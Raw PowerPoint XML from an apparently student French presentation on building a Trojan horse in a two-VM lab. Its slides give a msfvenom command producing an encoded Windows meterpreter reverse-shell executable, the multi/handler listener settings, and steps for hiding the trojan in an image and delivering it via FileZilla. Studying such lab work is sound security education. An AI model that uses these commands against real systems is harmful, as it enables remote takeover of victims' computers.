            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3599145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u="sng" dirty="0" smtClean="0">
                <a:latin typeface="Stencil" panose="040409050D0802020404" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>DEROULEMENT DE L’ATTAQUE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Stencil" panose="040409050D0802020404" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Stencil" panose="040409050D0802020404" pitchFamily="82" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="Stencil" panose="040409050D0802020404" pitchFamily="82" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Utiliser deux machines virtuelles : une pour la cible et l’autre pour l’attaquant</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Programmation du trojan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>en utilisant </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>différentes commande sur kali linux:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> (L’outil utilisé </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>) et l’insertion du trojan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>danq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> une image sous </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>windows</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>(par archivage)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>L’envoie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>de l’image à </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>cible via « Filezilla » (Pour se faciliter la taille on a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>dû </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>désactiver la plupart des protections)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Après le téléchargement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>de l’image par </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>cible, son exécution suffira à l’activer.</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2797454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smtClean="0">
                <a:latin typeface="Stencil" panose="040409050D0802020404" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>Les outils</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" u="sng" dirty="0">
              <a:latin typeface="Stencil" panose="040409050D0802020404" pitchFamily="82" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" u="sng" dirty="0" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> : C’est un outil de sécurité d’exploitation de vulnérabilité. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Pour lancer metasploit on utilise les commandes suivantes :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>service postgresql start</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>msfconsole</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2690051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Les outils</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" u="sng" dirty="0" smtClean="0"/>
              <a:t>Msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> : Modifier le payload pour pour éviter qu’il soit détecté par les antivirus mais victime de son succès la signature de cette commande est intégré dans la plupart des antivirus utilisé de nos jours</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>msfvenom –p windows/x64/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>meterpreter_reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> LHOST=192.168.1.15           LPORT=5555 –f exe –e x86/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>shikata_ga_nai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> –i 10 &gt;trojan.exe</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="278839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Les outils</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Forcer la machine du </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>pirate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>à écouter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>le port 5555</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Use multi/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>handler</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Set payload windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Set LHOST 192.168.1.15</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Set LPORT 5555</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2069865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l"/>
            <a:r>
              <a:rPr lang="fr-FR" u="sng" dirty="0">
                <a:latin typeface="Stencil" panose="040409050D0802020404" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>CODE SOURCE DU TROJAN</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="Stencil" panose="040409050D0802020404" pitchFamily="82" charset="0"/>
            </a:endParaRP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150" y="2193925"/>
            <a:ext cx="8453699" cy="4024313"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3196495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raînée de condensation">
  <a:themeElements>
    <a:clrScheme name="Traînée de condensation">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Traînée de condensation">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raînée de condensation">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TM04033937[[fn=Traînée de condensation]]</Template>
  <TotalTime>506</TotalTime>
  <Words>438</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Grand écran</PresentationFormat>
  <Paragraphs>61</Paragraphs>
  <Slides>21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vt:lpstr>
      <vt:lpstr>Century Gothic</vt:lpstr>
      <vt:lpstr>Stencil</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Traînée de condensation</vt:lpstr>
      <vt:lpstr>CHEVAL DE TROIE </vt:lpstr>
      <vt:lpstr>CHEVAL DE TROIE </vt:lpstr>
      <vt:lpstr>INTRODUCTION </vt:lpstr>
      <vt:lpstr>BUT DU PROJET </vt:lpstr>
      <vt:lpstr>DEROULEMENT DE L’ATTAQUE </vt:lpstr>
      <vt:lpstr>Les outils</vt:lpstr>
      <vt:lpstr>Les outils</vt:lpstr>
      <vt:lpstr>Les outils</vt:lpstr>
      <vt:lpstr>CODE SOURCE DU TROJAN</vt:lpstr>
      <vt:lpstr>CODE SOURCE DU TROJAN</vt:lpstr>
      <vt:lpstr>CODE SOURCE DU TROJAN</vt:lpstr>
      <vt:lpstr>CODE SOURCE DU TROJAN</vt:lpstr>
      <vt:lpstr>CODE SOURCE DU TROJAN</vt:lpstr>
      <vt:lpstr>CODE SOURCE DU TROJAN</vt:lpstr>
      <vt:lpstr>Moyen de transfert du virus(Filezilla)</vt:lpstr>
      <vt:lpstr>Attaque réussie (table ARP) </vt:lpstr>
      <vt:lpstr>FICHIERS SYSTEME</vt:lpstr>
      <vt:lpstr>INFORMATION RESEAU</vt:lpstr>
      <vt:lpstr>CAPTURE PRISE DEPUIS LE PC DU PIRATE</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CHEVAL DE TROIE</dc:title>
  <dc:creator>info</dc:creator>
  <cp:lastModifiedBy>info</cp:lastModifiedBy>
  <cp:revision>32</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-01-21T23:12:22Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-01-25T14:23:36Z</dcterms:modified>
</cp:coreProperties>
</file>